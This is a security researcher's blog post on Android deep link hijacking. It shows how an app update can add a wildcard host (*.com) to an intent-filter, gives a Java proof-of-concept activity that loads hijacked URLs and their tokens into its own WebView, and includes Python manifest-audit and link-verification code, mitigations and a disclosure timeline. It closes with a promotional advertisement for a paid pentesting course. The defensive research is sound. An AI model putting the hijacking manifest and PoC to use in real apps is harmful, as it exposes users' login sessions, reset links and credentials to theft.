In this blog, I will explain how I discovered a vulnerability that allowed me to take over multiple accounts by exploiting deep links in Android applications.

Deep Link

Deep links are a type of link that sends users directly to an app instead of a website or store. They are used to navigate users to specific in-app locations, saving time and improving user experience.

Deep linking works by registering a custom URL scheme (or Universal Links on iOS) or an intent URL handled by an intent-filter (on Android), so that the link opens the app if it is already installed. These links are also used for campaigns or specific events.

Attack

Android provides a mechanism called "App Links," designed specifically for routing web URLs to mobile applications. Because the set of links an app claims can change with an update, deep link hijacking remains possible even after the app has been installed and granted permission.

Here's how an attacker can exploit it:

  1. The attacker develops a malicious app with a deep link hijacking payload.
  2. When a user clicks on a deep link, a prompt appears asking whether to open the link "JUST ONCE" or "ALWAYS."
  3. If the user selects "ALWAYS," the malicious app is triggered whenever a deep link is clicked.
  4. The attacker updates the app to extend the payload, allowing it to hijack any deep link.
  5. Users receive and install the update from the Google Play Store.
  6. After the update, any clicked link triggers the malware without user interaction.

Technical Explanation

The vulnerability arises from the misuse of Android's intent-filter. By modifying the deep link host pattern in an app update, an attacker can hijack all URLs and force them to open inside the malicious application.


    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <!-- Host declared in the first release: the only one the user knowingly approves -->
        <data android:scheme="https" android:host="cappriciosec.com"/>
        <!-- Host added in the update: a wildcard that matches every .com domain -->
        <data android:scheme="https" android:host="*.com"/>
    </intent-filter>

Initially, users grant permission only for cappriciosec.com. However, after an update, the wildcard *.com allows all domains to be hijacked. This means sensitive links (Google login, banking pages, etc.) open inside the malicious app.
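As an added defender-side example (not code from the original post), the following Python script audits a decompiled AndroidManifest.xml for exactly the pattern described above: a VIEW + BROWSABLE intent-filter whose host is a wildcard, or whose http/https host is not marked with android:autoVerify so that Android never checks domain ownership. The manifest text is constructed for the example and mirrors the filter shown above; the package name com.example.hijack is a placeholder. A second, corrected manifest (exact host, autoVerify on) is derived from it to show what a clean result looks like.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(name):
    """Namespaced attribute key as ElementTree stores it (android:name -> {ns}name)."""
    return "{%s}%s" % (ANDROID_NS, name)


# Constructed manifest fragment mirroring the filter shown in the post; the
# package name com.example.hijack is a placeholder, not a real app.
HIJACK_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.hijack">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="cappriciosec.com"/>
        <data android:scheme="https" android:host="*.com"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

# The same activity declared the way the Mitigation section recommends:
# one exact host, and autoVerify so Android checks the site's assetlinks.json.
VERIFIED_MANIFEST = HIJACK_MANIFEST.replace(
    "<intent-filter>", '<intent-filter android:autoVerify="true">'
).replace('        <data android:scheme="https" android:host="*.com"/>\n', "")


def audit_manifest(xml_text):
    """Return (activity, host, issue) tuples for risky web deep-link filters."""
    findings = []
    root = ET.fromstring(xml_text)
    for activity in root.iter("activity"):
        activity_name = activity.get(android_attr("name"))
        for flt in activity.findall("intent-filter"):
            actions = {e.get(android_attr("name")) for e in flt.findall("action")}
            categories = {e.get(android_attr("name")) for e in flt.findall("category")}
            # Only filters a browser can hand a URL to are deep-link entry points.
            if "android.intent.action.VIEW" not in actions:
                continue
            if "android.intent.category.BROWSABLE" not in categories:
                continue
            auto_verify = flt.get(android_attr("autoVerify")) == "true"
            for data in flt.findall("data"):
                scheme = data.get(android_attr("scheme"))
                host = data.get(android_attr("host"))
                if host is None:
                    continue
                if host.startswith("*"):
                    findings.append((activity_name, host, "wildcard host"))
                if scheme in ("http", "https") and not auto_verify:
                    findings.append((activity_name, host, "web host without autoVerify"))
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(HIJACK_MANIFEST):
        print("RISK: activity=%s host=%s issue=%s" % finding)
    print("verified manifest findings:", audit_manifest(VERIFIED_MANIFEST))
```

Run it against the manifest pulled from an APK (for example with apktool) to see which activities would receive arbitrary web URLs. The wildcard rule is what catches the update in the post; the autoVerify rule catches the broader weakness, since a filter that is never verified relies entirely on the user's "ALWAYS" choice. Note that since Android 12 unverified http/https intents are no longer offered to an app by default, but older devices still show the chooser described above.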

Impact

This vulnerability can be exploited to:

  • Hijack session tokens
  • Bypass two-factor authentication (2FA)
  • Steal password reset links or tokens
  • Compromise account credentials
  • Intercept and manipulate web requests

Steps to Reproduce

  1. Develop an Android malware with a deep link hijacking payload.
  2. Distribute the malicious app and trick users into installing it.
  3. Users grant permission to open specific deep links.
  4. Update the app with a new payload to hijack all deep links.
  5. Now, any link clicked by the user triggers the malware automatically.

Proof of Concept (POC)


    import android.net.Uri;
    import android.os.Bundle;
    import android.webkit.WebSettings;
    import android.webkit.WebView;
    import android.webkit.WebViewClient;
    import android.widget.Toast;
    import androidx.appcompat.app.AppCompatActivity;

    // PoC receiver: whatever URL the hijacked intent carries is loaded into a
    // WebView owned by this app, so any token in the link is now visible to it.
    public class MainActivity extends AppCompatActivity {
        private WebView webview;
        private Uri url;

        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);

            // Both conditions must hold; the original used ||, which dereferences a null intent.
            if (getIntent() != null && getIntent().getData() != null) {
                url = getIntent().getData();
                webview = findViewById(R.id.web);
                webview.setWebViewClient(new WebViewClient()); // keep navigation inside this WebView
                WebSettings webSettings = webview.getSettings();
                webSettings.setJavaScriptEnabled(true);         // configure before loading the page
                webview.loadUrl(String.valueOf(url));

                Toast.makeText(getApplicationContext(), "Hacked", Toast.LENGTH_SHORT).show();
            }
        }
    }

POC Video 1

POC Video 2

POC Video 3

Mitigation

To prevent deep link hijacking, developers should:

  • Verify package name and domain integrity before opening a deep link.
  • Use Digital Asset Links (DAL) to validate the app's ownership of a domain.
  • Restrict the scope of intent-filters and avoid wildcard hosts.
  • Enforce strong authentication before processing sensitive deep links.
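The first two mitigations above can be expressed as concrete checks. The following Python is an added example, not code from the original post or from any real app: assetlinks_authorizes() validates the Digital Asset Links document a domain serves at /.well-known/assetlinks.json against the package name and signing-certificate fingerprint the app is expected to have, and is_safe_deep_link() is the exact-host allowlist an app should apply to an incoming URL before loading it. The package name com.example.legitapp, the fingerprint, and the assetlinks.json content are constructed placeholders.

```python
import json
from urllib.parse import urlsplit

# Hypothetical values for the example; a real app uses its own package name and
# the SHA-256 fingerprint of its signing certificate (placeholder below).
EXPECTED_PACKAGE = "com.example.legitapp"
EXPECTED_FINGERPRINT = ("00:11:22:33:44:55:66:77:88:99:AA:BB:CC:DD:EE:FF:"
                        "00:11:22:33:44:55:66:77:88:99:AA:BB:CC:DD:EE:FF")

HANDLE_ALL_URLS = "delegate_permission/common.handle_all_urls"

# Constructed assetlinks.json, as the site would serve it at
# https://<domain>/.well-known/assetlinks.json
SAMPLE_ASSETLINKS = json.dumps([{
    "relation": [HANDLE_ALL_URLS],
    "target": {
        "namespace": "android_app",
        "package_name": EXPECTED_PACKAGE,
        "sha256_cert_fingerprints": [EXPECTED_FINGERPRINT],
    },
}])


def _norm_fp(fp):
    """Compare fingerprints case- and colon-insensitively."""
    return fp.replace(":", "").strip().upper()


def assetlinks_authorizes(doc_text, package_name, fingerprint):
    """True iff the document delegates URL handling to this package signed with
    this certificate. Any malformed input is treated as 'not authorized'."""
    try:
        statements = json.loads(doc_text)
    except ValueError:
        return False
    if not isinstance(statements, list):
        return False
    want = _norm_fp(fingerprint)
    for stmt in statements:
        if not isinstance(stmt, dict) or HANDLE_ALL_URLS not in stmt.get("relation", []):
            continue
        target = stmt.get("target", {})
        if target.get("namespace") != "android_app":
            continue
        if target.get("package_name") != package_name:
            continue
        fps = {_norm_fp(f) for f in target.get("sha256_cert_fingerprints", [])}
        if want in fps:
            return True
    return False


# Exact hosts the app is willing to open; no wildcards.
ALLOWED_HOSTS = {"cappriciosec.com", "www.cappriciosec.com"}


def is_safe_deep_link(url):
    """Allowlist check an app should apply to getIntent().getData() before
    loading it in a WebView or acting on any token it carries."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        return False
    # A user@host form puts the trusted name in the userinfo; hostname is
    # what is actually contacted, so reject any URL carrying credentials.
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").lower()
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    print("assetlinks ok:", assetlinks_authorizes(SAMPLE_ASSETLINKS, EXPECTED_PACKAGE, EXPECTED_FINGERPRINT))
    for candidate in ("https://cappriciosec.com/reset?token=abc",
                      "http://cappriciosec.com/",
                      "https://cappriciosec.com.evil.example/"):
        print(candidate, "->", is_safe_deep_link(candidate))
```

The fingerprint normalisation matters because tools print it in different cases and with or without colons; a naive string compare would reject a valid file. The host check deliberately matches whole hostnames, so a lookalike such as a subdomain of another registrable domain never passes, which is the runtime counterpart of refusing wildcard hosts in the manifest.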

Timeline

  • Reported to Android OS Security Team: August 7, 2020
  • Issue Created: August 10, 2020
  • Assigned Date: August 11, 2020

Professional Certified Mobile App Pentesting (Android & iOS) | 100% Live Hacking in Tamil | Real Apps, Real Vulnerabilities, Real Bounties

🔥 Limited-Time Offer: ₹5,500 course now at just ₹2,500!

Enroll / Learn more: https://university.cappriciosec.com/CMABP.html

What you get

  • Live, hands-on pentesting on real mobile applications, no fake labs. Learn how real bugs are discovered, validated, and responsibly disclosed.
  • Comprehensive curriculum: Android & iOS architecture, app signing, manifest & entitlement analysis, reverse engineering, dynamic instrumentation, network interception, OAuth & deep-link attacks, PKCE, secure storage, mobile-specific exploit mitigations, and remediation guidance.
  • Real-world case studies and POC walkthroughs (responsibly redacted for public safety).
  • Career & bounty guidance: how to write reports, interact with bug bounty platforms, and turn findings into money or job offers.
  • Final certification exam & course completion certificate.
  • Live Q&A, lifetime access to recorded sessions, and direct mentorship.

Student success snippets: real wins 🔥

Real outcomes from our Certified Mobile App Pentesting (Android & iOS) course, live sessions in Tamil. No simulated labs, real results.


  • Sandiyo Christan 💰 (bug bounty success, real program): Sandiyo earned a $2,500 bounty from Google through a real program after applying techniques learned in the course. 🎯
  • Dinesh 🚀 (career: Android Security Specialist): Dinesh earned bounties on HackerOne and later joined Google as an Android Security Specialist. 🙌
  • Jeyashri 🎓 (secure-code developer, Chennai): Jeyashri secured a 6 LPA position as a secure-code developer in Chennai after completing the course. 📈
  • ★ And more… ✨ (bounties & job placements): Many students have turned practical skills into bug bounties and security roles; your success could be next. 💡

Course essentials
Language: Entire course delivered in Tamil 🇮🇳
Format: Live sessions, practical demos, and guided exercises.

Demo of our course:

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!